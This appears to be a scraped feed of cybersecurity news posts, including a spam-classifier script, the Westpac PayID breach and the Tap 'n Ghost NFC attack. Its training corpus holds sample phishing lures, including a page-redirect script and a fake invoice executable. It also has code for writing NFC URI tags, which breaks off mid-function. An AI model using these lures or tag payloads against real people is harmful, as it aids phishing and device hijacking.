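        "script": "<script" in body.lower(),
        "attachment": attachment,
        "short_body": len(body) < 160,
    }
    feats.update({"kw_" + k: k in words for k in KEYWORDS})
    return feats


class BernoulliNB:
    """Naive Bayes over binary features with Laplace (add-one) smoothing."""

    def fit(self, samples):
        """samples: list of (features, label) with labels 'spam' / 'ham'."""
        counts = Counter(label for _, label in samples)
        self.prior = {lab: math.log(n / len(samples)) for lab, n in counts.items()}
        self.cond = {}
        for lab, n in counts.items():
            self.cond[lab] = {
                f: (sum(1 for x, y in samples if y == lab and x[f]) + 1) / (n + 2)
                for f in samples[0][0]}
        return self

    def score(self, feats):
        """Log-odds of spam versus ham; positive means spam."""
        logp = {}
        for lab, lp in self.prior.items():
            for f, p in self.cond[lab].items():
                lp += math.log(p if feats[f] else 1.0 - p)
            logp[lab] = lp
        return logp["spam"] - logp["ham"]

    def predict(self, raw):
        return "spam" if self.score(extract_features(raw)) > 0 else "ham"


# Constructed training corpus: (body, html?, attachment filename, label).
CORPUS = [
    ("<p>Your account is locked. <a href='http://203.0.113.9/login'>Verify</a> "
     "your password: http://203.0.113.9/verify http://bad.example.test/x</p>",
     True, None, "spam"),
    ("<p>URGENT: confirm your account within 24 hours</p>"
     "<script>document.location='http://198.51.100.7/'</script>", True, None, "spam"),
    ("URGENT: please see the attached invoice. The archive password is 1234.",
     False, "invoice.exe", "spam"),
    ("Hi team, the weekly planning meeting moves to Thursday at 10:00. Agenda and "
     "slides are on the wiki: https://wiki.example.test/planning. Please bring "
     "your updates on the migration project and the quarterly review.",
     False, None, "ham"),
    ("<p>Thanks for the quick turnaround on the release notes. I reviewed the draft "
     "and left comments inline; the only open question is whether section three "
     "should describe the rollback procedure in more detail.</p>", True, None, "ham"),
    ("Attached is the signed contract for the data centre lease, as discussed in "
     "yesterday's meeting. Let me know if finance needs anything else from us "
     "before the end of the month.", False, "lease.pdf", "ham"),
]


def train_filter():
    """Train the classifier on the constructed corpus."""
    samples = [(extract_features(build_message(b, h, a)), lab)
               for b, h, a, lab in CORPUS]
    return BernoulliNB().fit(samples)
```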

Machine learning and malware detection

For a long time, traditional malware detection methods focused on identifying features like hashes, file properties, code fragments etc. But with the introduction of server-side polymorphism, such detection methods have become irrelevant and obsolete. Today there has been a big shift away from the former rule-based methods toward detecting malware by analyzing files in the pre-execution phase itself using machine learning. Detecting advanced malware attacks, including ransomware attacks, has thus become easier and more effective, thanks to machine learning. Deep learning algorithms are also used to detect rare, high-profile targeted attacks. Thus, machine learning is helping us detect all kinds of malware including trojans, ransomware, adware, spyware etc.

Machine learning has its own limitations as well!

Machine learning, which has immense possibilities when it comes to preventing cybercrime, has its limitations as well. For example, there are ambiguities in defining activities as ‘normal’ or ‘anomalous’. There are also issues of adaptability to new patterns and to drastically changing attack methods. False positives also pose a headache for machine learning methods.

Despite these limitations, machine learning is definitely helping us improve cybersecurity. The limitations will be overcome in due course, and machine learning will offer us further possibilities for cybercrime detection and prevention.

Related Blogs:

Man Vs. Machines: Employing Artificial Intelligence in Cybersecurity

Cyber security and strategy

Average Cost of Cyberattack Exceeds $1 Million

The post How Machine Learning Helps Improve Cybersecurity appeared first on .

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

Hackproofing smart meters and boosting smart grid security

Smart electricity meters are useful because they allow energy utilities to efficiently track energy use and allocate energy production. But because they’re connected to a grid, they can also serve as back doors for malicious hackers. Cybersecurity researcher Karthik Pattabiraman, an associate professor of electrical and computer engineering at UBC, recently developed an automated program aimed at improving the security of these devices and boosting security in the smart grid. “Our program uses two detection …

The post Hackproofing smart meters and boosting smart grid security appeared first on Help Net Security.

Podcast Two Year Anniversary – The Top 10 Episodes

Two years ago on June 9th, 2017 I released the first episode of Security In Five. Here we are two years later, 500+ episodes recorded and no signs of slowing down. The podcast’s longevity and the energy to keep up the daily episode schedule is all because of the listeners and feedback I have received. […]

The post Podcast Two Year Anniversary – The Top 10 Episodes appeared first on Security In Five.

How human bias impacts cybersecurity decision making

The human brain is a fantastic machine, but we’re all subject to cognitive bias and reasoning errors – and cybersecurity pros are no exception. In a newly released report, Dr Margaret Cunningham, psychologist and Principal Research Scientist at Forcepoint, examined six universal unconscious human biases and how they can influence cybersecurity decision making, and urges infosec pros and leaders to make an effort to overcome them. Inconvenient cognitive biases Our days are filled with decision making: …

The post How human bias impacts cybersecurity decision making appeared first on Help Net Security.

Is there a weak link in blockchain security?

Recent research revealed that blockchain is set to become ubiquitous by 2025, entering mainstream business and underpinning supply chains worldwide. This technology is set to provide greater transparency, traceability and immutability, allowing people and organizations to share data without having to be concerned about security. However, blockchain is only as strong as its weakest link. Despite the praise surrounding blockchain’s immutable security, there are still risks surrounding it that organizations must be aware of – …

The post Is there a weak link in blockchain security? appeared first on Help Net Security.

There’s a significant disconnect between DevOps capabilities and DevSecOps readiness

Retailers are putting their customers’ data at risk by failing to incorporate proper security controls in their new application development practices, according to the latest research from Claranet. DevOps adoption While the vast majority of retailers have adopted or plan to adopt a DevOps approach to speed up development cycles and improve the customer experience, less than half are completely confident in their ability to integrate security into this approach – also known as DevSecOps. …

The post There’s a significant disconnect between DevOps capabilities and DevSecOps readiness appeared first on Help Net Security.

What Is SOC (Security Operations Center)?

What Is an SOC?

An SOC, or Security Operations Center, is a facility used by an information security team that is responsible for monitoring, analyzing, and ensuring an organization’s security. The main goal of the team is to find and respond to cybersecurity threats and incidents with the use of set processes and technological solutions. The security staff, composed of engineers, managers, and analysts, works closely with incident response teams to quickly address any security issue.

The SOC is responsible for monitoring and analyzing activities on different networks, databases, websites, applications, servers, and any other systems that the organization is using. It looks for any anomalous activity that could be an indication of a security threat. Once detected, the SOC is then tasked to respond to the incident; identify, analyze, and report it; and create new defensive processes against it if necessary.

How Does an SOC Work?

Instead of focusing on developing new strategies or designing security architecture, the SOC is responsible for the here and now, ensuring the safety of the organization’s systems. It is staffed primarily by security analysts working to detect and analyze cybersecurity incidents. Upon discovery, they respond to, report, and work to prevent a recurrence of the incident. The team can also usually perform advanced forensic analysis, as well as cryptanalysis, and has the ability to reverse engineer malware to understand it better for future defense.

In order to establish an SOC, the organization first needs a clear strategy that incorporates the business’s goals from the different departments. Once this is developed, it is time to create an infrastructure to support that strategy. Security officer Pierluigi Paganini says that typically, SOCs include firewalls, breach detection capabilities, probes, IPS/IDS, and of course, a Security Information and Event Management System (SIEM). The infrastructure should also be able to collect data from different data flows, packet capture, syslog, and telemetry, as well as other data activities that can be collected and analyzed by the security staff.

Lastly, the SOC needs the ability to monitor networks and endpoints for vulnerabilities, to protect the sensitive data they may hold and to comply with industry or government regulations.

SOC Benefits

The main benefit of an SOC is to improve the organization’s overall security incident detection and response. By analyzing all data activity, any breach should be quickly identified and responded to accordingly. This is a 24/7 monitoring function that aims to block any and all malicious attacks against the organization.

SOC Best Practices

The industry’s focus is shifting toward the human element for assessing and mitigating threats, rather than relying on scripts to do so. SOC security personnel continuously manage known threats while trying to identify new ones. While technologies such as firewalls and IPS can prevent most basic attacks, it is human analysis that leads to discovering and responding to major incidents.

Any organization should have their SOC updated with the latest intelligence to use against potential malicious attacks. They need to keep up to date with what is happening and watch out for growing threats. At the same time, they need to keep updated with internal procedures and changes, as well as make proper adjustments in data collection and correlation and provide insights on threats and vulnerabilities. Lastly, tools need to be updated to be able to keep up with ever-changing security threats from external attacks.

A very successful SOC combines highly skilled security analysts with efficient security automation. This is a huge undertaking, and many organizations that cannot maintain the proper in-house resources turn instead to managed service providers that offer SOC services.

The post What Is SOC (Security Operations Center)? appeared first on .

Westpac Cybersecurity Breach Impacts Almost 100,000 Customers

A major cybersecurity breach that has struck Australia’s Westpac Banking Corporation has reportedly impacted almost 100,000 customers.

Australian website nine.com.au reports, “A major cyber security breach has seen the private details of almost 100,000 Westpac customers exposed after the bank’s system was attacked by hackers.”

As per reports, it was PayID, the real-time payments platform that allows instant money transfer between banks using a mobile number or email address, that was targeted by the cybercriminals in this attack.

The Sydney Morning Herald, in a detailed report on the hacking incident, notes, “Unknown to many Australians, PayID operates like a telephone book, allowing anyone to type in a mobile number or email address and have it confirm the name of the corresponding account holder. This allows for what security experts call an “enumeration attack”, whereby numbers can be changed at random to find the names and mobile numbers of thousands of Australians…Experts say that with access to these details, fraud could be committed on a mass scale.”

Though Westpac has confirmed the attack, details haven’t been divulged as regards the number of people affected, say reports. It’s also reported that the Westpac data breach has affected customers from other banks as well.

The Sydney Morning Herald reports that Westpac has disclosed information about the breach to Australia’s banking and financial industry in a confidential memo, which has been obtained by the Sydney Morning Herald and The Age. As per the report, the memo says, “On 22 May 2019, Westpac noted that a high volume ([around] 600,000) of NPPA PayID lookups was made from 7 compromised Westpac Live accounts. [Around 98,000] of the lookups successfully resolved to a short name and this was displayed to the fraudster… Further analysis revealed that the attacks had been occurring since 7 April 2019 (the total number of lookups is [around] 600,000). The attackers are possibly offshore (the … intelligence of the logins indicates [they are] US-based fraudsters).”

The memo clarifies that the accounts that have been used for the breach seem to have been either compromised or set up to perform the attack. It’s stated that Westpac had got in touch with the legitimate owners of the existing accounts and they were not aware of the attacks or involved in any way. The Sydney Morning Herald report also states that as per the memo, the hackers had been trying phone numbers in a semi-sequential manner and also that it appears likely that the numbers are targeted based on guessing and don’t come from any existing data compromise. It’s also stated that the attacks were continuing on a semi-daily basis.
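The memo quoted above describes three signals a defender can monitor for: an unusually high volume of PayID lookups from a single account, queried numbers that advance semi-sequentially, and a low share of lookups that actually resolve to a name. The following detection logic is an added example, not Westpac’s or NPPA’s code; the log format, the account identifiers, the thresholds and the sample lookups are all constructed.

```python
"""Added example, not Westpac's or NPPA's code: flagging enumeration-style
PayID lookup behaviour from constructed lookup-log lines. Log format, account
ids, thresholds and sample data are assumptions."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> <account_id> lookup <phone> <resolved|miss>"
LOOKUP_RATE_LIMIT = 20        # lookups per account per window (assumed policy)
WINDOW = timedelta(minutes=10)
SEQUENTIAL_FRACTION = 0.6     # share of successive queries within a small step


def build_sample_log():
    """Constructed lookup log: one ordinary customer paying three contacts,
    and one account walking through numbers in small steps, seconds apart."""
    lines, t0 = [], datetime(2019, 5, 22, 9, 0, 0)
    for i, phone in enumerate(("0412345678", "0499887766", "0431122334")):
        ts = (t0 + timedelta(minutes=3 * i)).isoformat()
        lines.append(f"{ts} acct-0001 lookup {phone} resolved")
    number = 412000010
    for i in range(25):
        number += (1, 2, 1, 3)[i % 4]            # small, always increasing steps
        result = "resolved" if i % 6 == 0 else "miss"
        ts = (t0 + timedelta(seconds=4 * i)).isoformat()
        lines.append(f"{ts} acct-7701 lookup 0{number} {result}")
    return "\n".join(lines)


def parse_log(text):
    """Parse log lines into (timestamp, account, phone, result) tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, acct, _, phone, result = line.split()
            events.append((datetime.fromisoformat(ts), acct, phone, result))
    return events


def volume_alerts(events, limit=LOOKUP_RATE_LIMIT, window=WINDOW):
    """Accounts exceeding `limit` lookups inside any sliding time window,
    mapped to the peak count observed."""
    by_acct = defaultdict(list)
    for ts, acct, _, _ in events:
        by_acct[acct].append(ts)
    flagged = {}
    for acct, times in by_acct.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:
                start += 1
            count = end - start + 1
            if count > limit:
                flagged[acct] = max(flagged.get(acct, 0), count)
    return flagged


def sequential_alerts(events, max_step=5, fraction=SEQUENTIAL_FRACTION):
    """Accounts whose successive queried numbers mostly differ by a small step,
    the signature of an enumeration rather than of a customer paying contacts."""
    by_acct = defaultdict(list)
    for _, acct, phone, _ in sorted(events):
        by_acct[acct].append(int(phone))
    flagged = {}
    for acct, nums in by_acct.items():
        if len(nums) < 5:                          # too few queries to judge
            continue
        close = sum(1 for a, b in zip(nums, nums[1:]) if 0 < abs(b - a) <= max_step)
        ratio = close / (len(nums) - 1)
        if ratio >= fraction:
            flagged[acct] = round(ratio, 2)
    return flagged


def hit_rates(events):
    """Share of lookups that resolved to a name; enumeration scores low because
    most guessed numbers are not registered PayIDs."""
    totals, hits = Counter(), Counter()
    for _, acct, _, result in events:
        totals[acct] += 1
        hits[acct] += result == "resolved"
    return {acct: hits[acct] / totals[acct] for acct in totals}


def enumeration_report(log_text):
    """Combine the three signals into one report keyed by flagged account."""
    events = parse_log(log_text)
    vol, seq, rates = volume_alerts(events), sequential_alerts(events), hit_rates(events)
    return {acct: {"peak_lookups": vol.get(acct), "sequential_ratio": seq.get(acct),
                   "hit_rate": round(rates[acct], 2)}
            for acct in sorted(set(vol) | set(seq))}
```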

Westpac, upon detecting the issue, took additional preventive actions and managed to continue operating without a system shutdown. It’s also reported that no customer bank account numbers were compromised in the attack.

Experts point out that this data breach could make customers refrain from using the PayID system until they are certain that their personal data won’t be breached.

Also Read:

Data Breaches in Healthcare Comes From Within

Cybersecurity Breaches Against Canadian Companies on the Rise

The post Westpac Cybersecurity Breach Impacts Almost 100,000 Customers appeared first on .

Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know

In October 2017, the city of Fort Worth, Texas became the target of a phishing scam.

Their accounts payable department received an email that appeared to be from Imperial Construction, a company that was doing business with the city at the time. The sender of the email, later identified as Gbenga A. Fadipe, requested a change of account.

The scam email prompted the department to change an electronic deposit from Plains Capital Bank to a different account with Chase Bank. Given the convincing nature of the email, the request received approval. The city’s accounts payable department believed that Imperial Construction had simply changed banks.

However, this wasn’t the case. Fadipe had planned the cyberattack to gain access to city accounts. According to the arrest warrant affidavit, he withdrew thousands of dollars between November 2017 and January 2018 from the new account with Chase Bank, severely compromising the cybersecurity of Fort Worth.

City officials responded, claiming that Fort Worth “had been the victim of fraud in late 2017 when, due to human error, a vendor payment was redirected to a bad actor.” As of now, Tarrant County has charged Fadipe with theft of property greater than $300,000, though the true cost of the scam is much higher. The injustice might have ended here, were it not for the events that transpired shortly afterwards.

Retaliation Against Whistleblowers

Fort Worth’s former IT manager, William Birchett, went to officials with concerns over the state of their cybersecurity following the attack. He made several claims, including that the city had left the medical and personal information of their employees accessible to anyone with internet access.

Birchett also brought attention to how the city had lied about its compliance with FBI crime database regulations. He reported his findings and submitted a proposal to Kevin Gunn, the city’s acting chief financial officer. Birchett also went to Roger Wright, the city’s acting chief technology officer.

Instead of moving forward with the changes, city officials fired Birchett in retaliation. They would later fire one of Birchett’s coworkers, Ronald Burke, who had previously supervised him. Both men have since filed whistleblower lawsuits against the city, with representation from attorney Stephen Kennedy.

Burke has also claimed the city retaliated against him for reporting issues with their cybersecurity and compliance with federal regulations. Like Birchett, Burke is seeking more than $1 million from the city of Fort Worth, which is “fully prepared to defend itself,” according to a recent statement from officials.

Response From Fort Worth Officials

In response to the allegations from Birchett and Burke, city officials said, “The people who have filed these suits were responsible for managing the very security items that they are now criticizing…” Officials went on to say they resolved the problem with their employee data “immediately,” but this is not the case.

Stephen Kennedy responded to the attempt by city officials to address the controversy, saying, “The City is not being forthright when it claims that it ‘immediately’ resolved issues concerning preservation of the City employees’ medical data information, unless your definition of the word immediate means six months…”

Birchett and Burke have provided additional insight into the city’s negligence. They allege that they repeatedly reported on problems with Fort Worth’s cybersecurity and compliance with federal Criminal Justice Information Services regulations. Despite their efforts, city officials refused to take action.

The behavior of Kevin Gunn, Robert Wright and other Fort Worth officials is indicative of a larger problem than the phishing scam with Imperial Construction. It shows a pattern of irresponsibility and neglect that goes back farther than 2017. Even with access to potential solutions, officials failed to act.

The Importance of Transparency

The decision to retaliate against whistleblowers is often counterproductive. In this instance, the city of Fort Worth was attempting to suppress information, but the firing of Birchett and Burke only brought that information to the surface. Though city officials tried to ignore the flaws in their system, the flaws only intensified.

This speaks to the importance of individuals like William Birchett and Ronald Burke. Without the courage of whistleblowers, an organization with illicit practices can continue to grow. Even if that organization retaliates, whistleblowers have protection under the law and can trust in the justice system to serve its purpose.

As context, OSHA’s Whistleblower Protection Program enforces the provisions in more than twenty whistleblower statutes, protecting employees in the healthcare, airline and food safety industries, among other sectors. In short, those who come forward with information about a company can expect fair treatment.

Looking Toward the Future

Gbenga A. Fadipe’s phishing scam revealed far more about the city of Fort Worth than anticipated. What started with a fraudulent email quickly transformed into something else, and now, Birchett and Burke are set to move forward with their individual lawsuits against the city. As the situation unfolds, it will likely have implications outside the state of Texas.

About the author


Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know appeared first on Security Affairs.

How to Advance ICS Cybersecurity: Implement Continuous Monitoring

Industrial Control Systems (ICS) include Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCS) and other control system configurations such as Programmable Logic Controllers (PLC). They are typically used in industries such as electric, water, oil and natural gas, transportation, chemical, pharmaceutical and manufacturing (e.g., automotive, aerospace). These control systems are vital to […]

The post How to Advance ICS Cybersecurity: Implement Continuous Monitoring appeared first on The State of Security.

Criminals are selling hacking services targeting world’s biggest companies

A new study – undertaken by Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey, and underwritten by Bromium – provides details of first-hand intelligence gathered from covert discussions with dark net vendors, alongside analysis by a panel of global industry experts across law enforcement and government. Network compromise tools and services on the dark net Key findings: 4 in 10 dark net vendors are selling targeted hacking services aimed at FTSE …

The post Criminals are selling hacking services targeting world’s biggest companies appeared first on Help Net Security.

Global communications service providers struggling to fend off growing number of DDoS attacks

Global communications service providers, whose businesses are predicated on continuous availability and reliable service levels, are struggling to fend off a growing number of DDoS attacks against their networks. A lack of timely and actionable intelligence is seen as a major obstacle to DDoS protection, according to A10 Networks. The critical need for DDoS protection The A10 Networks study conducted by the Ponemon Institute highlights the critical need for DDoS protection that provides higher levels … More

The post Global communications service providers struggling to fend off growing number of DDoS attacks appeared first on Help Net Security.

Workforce diversity key to plugging the IT skills gap

An (ISC)2 study of employees in 1,000 organizations in the U.K. and 250 in the Netherlands reveals that workplace diversity in IT and security has become a key operational concern, as organizations broaden their efforts to encourage diversity and inclusivity amid the impact of the sector’s skills shortage on IT and cybersecurity recruitment and staff retention. Talent acquisition and retention is the leading operational reason that companies have been ramping up their diversity initiatives, according … More

The post Workforce diversity key to plugging the IT skills gap appeared first on Help Net Security.

Trust nothing: A life in infosec is a life of suspicion

Like many before him, Amit Serper started his cybersecurity career in one of Israel’s intelligence agencies. Nine years later, he left for the private sector and joined Cybereason, a cyber security company started by former colleagues that specializes in endpoint detection and response (EDR) and managed detection and response (MDR). He started there as a senior security researcher and then progressed through different research roles. Today, he’s the company’s head of security research, leading Nocturnus, its advanced global … More

The post Trust nothing: A life in infosec is a life of suspicion appeared first on Help Net Security.

How privileged insiders threaten the security of global organizations

A new global survey from BeyondTrust explores the visibility, control, and management that IT organizations in the U.S., APAC, Europe and the Middle East have over employees, contractors, and third-party vendors with privileged access to their IT networks. Security hygiene According to the report, 64% believe they’ve likely had either a direct or indirect breach due to misused or abused employee access in the last 12 months, and 62% believe they’ve had a breach due … More

The post How privileged insiders threaten the security of global organizations appeared first on Help Net Security.

Will biometrics replace passwords for online payment authentication?

Over half of consumers in the UK (53 percent) are worried that the shift to biometrics to authenticate online payments will dramatically increase the amount of identity fraud, according to new research conducted by Paysafe, a leading global payments provider. The research, found that over three quarters (79 percent) of consumers still favour passwords for making payments online due to concerns about the security of new biometric options. The annual study tracks changing views on … More

The post Will biometrics replace passwords for online payment authentication? appeared first on Help Net Security.

Revealed: 2016 Russian Troll Activity More Lucrative and Widespread

Online activity by Russian trolls in the lead-up to the 2016 election was significantly more widespread than initially estimated, cybersecurity firm Symantec concluded.

Symantec announced their findings following the analysis of a dataset released by Twitter in October 2018. The data, consisting of 3,900 accounts and 10 million tweets linked to a Russian company known as the Internet Research Agency (IRA), showed a massive and coordinated campaign to target both sides of the U.S. political divide with propaganda relating to wedge issues.

Symantec categorized the IRA’s Twitter activity into 123 “main accounts,” which had large numbers of followers and mostly generated new content, and 3,713 “auxiliary” accounts, which were used to amplify the messaging from those main accounts.

“Main accounts generally were ‘fake news’ outlets masquerading as regional news outlets, or pretending to be political parties or hashtag games,” stated the report. “The top 20 most retweeted English-language accounts were split evenly between conservative and liberal messages.”

The most successful account in the IRA campaign went by the username TEN_GOP. The handle dubbed itself the “Unofficial Twitter of Tennessee Republicans. Covering breaking news, national politics, foreign policy and more.” It managed to accumulate almost 150,000 followers and 6 million retweets, almost entirely from non-IRA-linked accounts.

Among the IRA fake news accounts were “New York City Today,” “Chicago Daily News,” “San Francisco Daily,” and many others. Their primary function seems to have been the proliferation and adoption of fake or skewed news content to further propagandize targeted audiences.

“It was a highly professional campaign. Aside from the sheer volume of tweets generated over a period of years, its orchestrators developed a streamlined operation that automated the publication of new content and leveraged a network of auxiliary accounts to amplify its impact.”


The post Revealed: 2016 Russian Troll Activity More Lucrative and Widespread appeared first on Adam Levin.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company who worked with AMCA, announced that they too experienced a breach affecting 11.9 million users.

Luckily, LabCorp stated that it does not store or maintain Social Security numbers or insurance information for its customers, and that it provided no ordered tests, lab results or diagnostic information to AMCA. LabCorp stated that it intends to provide 200,000 affected users with more specific information regarding the breach and offer them identity protection and credit monitoring services for two years. After being notified of the possible compromise, AMCA took down its web payments page and hired an external forensics firm to investigate.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

NFC Vulnerability May Promote Ghost Screen Taps

Convenience versus security is the recurring theme in cybersecurity today. Every time a new technology opens the door to more convenience, it also becomes the newest source of vulnerabilities. Here at hackercombat.com we keep reminding our readers that convenience is the natural enemy of security. The newest instance of this theme involves NFC and a new proof-of-concept attack presented by researchers from Waseda University in Tokyo, which they aptly named Tap ‘n Ghost.

The 18-page paper, by a team of three researchers (Tatsuya Mori, Seita Maruyama and Satohiro Wakabayashi), demonstrates a weakness in the NFC feature built into many mainstream smartphones sold today. They describe the attack as a combination of a Ghost Touch Generator and TAP (Tag-based Adaptive Ploy), which gives an attacker at close range the ability to generate “ghost taps” on a target device. The rig consists of a battery pack, a high-voltage transformer, an off-the-shelf 5 mm copper sheet, an NFC writer and a single-board computer such as a Raspberry Pi, or a small laptop.

(Image: the Tap ‘n Ghost proof-of-concept rig)

The image above shows the proof-of-concept contraption, which can be hidden inside a seemingly ordinary table in a restaurant, coffee shop or any public store. NFC only communicates over a range of roughly 4 to 10 centimeters, but with a rigged table like this the attacker can connect to a victim’s NFC-enabled smartphone (or any other device with NFC) placed on it and tell it to open a specific website automatically. The attacker can also issue a seemingly innocent request for Bluetooth pairing or a Wi-Fi connection, which fortunately requires the user’s permission to proceed.

Android 9.0 and older versions conveniently act on any NFC tag they detect nearby. The contraption’s copper sheet produces enough electrical disturbance within NFC range that the phone’s touchscreen registers “ghost taps”, indistinguishable from a user tapping the screen. At first glance this sounds like science fiction, but the three researchers showed in their presentation how these rogue taps can be generated to “grant permission” to the Bluetooth pairing or Wi-Fi connection requests mentioned above, completing the attack.
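The first stage of the attack above relies on a plain NFC Forum NDEF URI record: an unlocked Android phone that reads a tag carrying an http/https URI hands it to the browser without asking. The following is an added example, not code from the Tap ‘n Ghost paper or from hackercombat.com. It builds the record an NFC writer would program onto a tag, and a parser a defender can run over a dumped tag to see which records would auto-open a browser. The prefix codes are the NFC Forum URI Record Type Definition abbreviation table (only the first few are included); the function names (`encode_uri_record`, `decode_ndef`, `auto_open_uris`) and the sample URL are my own.

```python
"""Encode and decode NFC Forum NDEF URI records (added example, not the paper's code)."""
import struct
from typing import List, Optional, Tuple

# NFC Forum URI RTD abbreviation codes: the first payload byte replaces a common prefix.
# Only a subset of the table is listed here; 0x00 means "no abbreviation".
URI_PREFIXES = {
    0x00: "",
    0x01: "http://www.",
    0x02: "https://www.",
    0x03: "http://",
    0x04: "https://",
    0x05: "tel:",
    0x06: "mailto:",
}

TNF_WELL_KNOWN = 0x01                 # TNF field value for NFC Forum well-known types
FLAG_MB, FLAG_ME, FLAG_SR, FLAG_IL = 0x80, 0x40, 0x10, 0x08


def encode_uri_record(uri: str) -> bytes:
    """Build a single-record NDEF message carrying *uri* as a well-known 'U' record."""
    # Use the longest matching abbreviation so the tag payload is as short as possible.
    code, prefix = max(
        ((c, p) for c, p in URI_PREFIXES.items() if uri.startswith(p)),
        key=lambda cp: len(cp[1]),
    )
    payload = bytes([code]) + uri[len(prefix):].encode("utf-8")
    if len(payload) > 255:
        raise ValueError("payload over 255 bytes needs a long record (SR=0)")
    header = FLAG_MB | FLAG_ME | FLAG_SR | TNF_WELL_KNOWN   # 0xD1: first, last, short record
    # header, type length, 1-byte payload length (SR=1), type 'U', then the payload
    return struct.pack("BBB", header, 1, len(payload)) + b"U" + payload


def decode_ndef(message: bytes) -> List[Tuple[int, bytes, bytes]]:
    """Parse an NDEF message into (tnf, type, payload) tuples.

    Handles short (SR=1) and long (SR=0) records and skips an optional ID field (IL=1).
    """
    records, off = [], 0
    while off < len(message):
        hdr = message[off]; off += 1
        tnf = hdr & 0x07
        type_len = message[off]; off += 1
        if hdr & FLAG_SR:
            payload_len = message[off]; off += 1
        else:
            payload_len = struct.unpack(">I", message[off:off + 4])[0]; off += 4
        id_len = 0
        if hdr & FLAG_IL:
            id_len = message[off]; off += 1
        rtype = message[off:off + type_len]; off += type_len
        off += id_len                                   # ID field is not needed here
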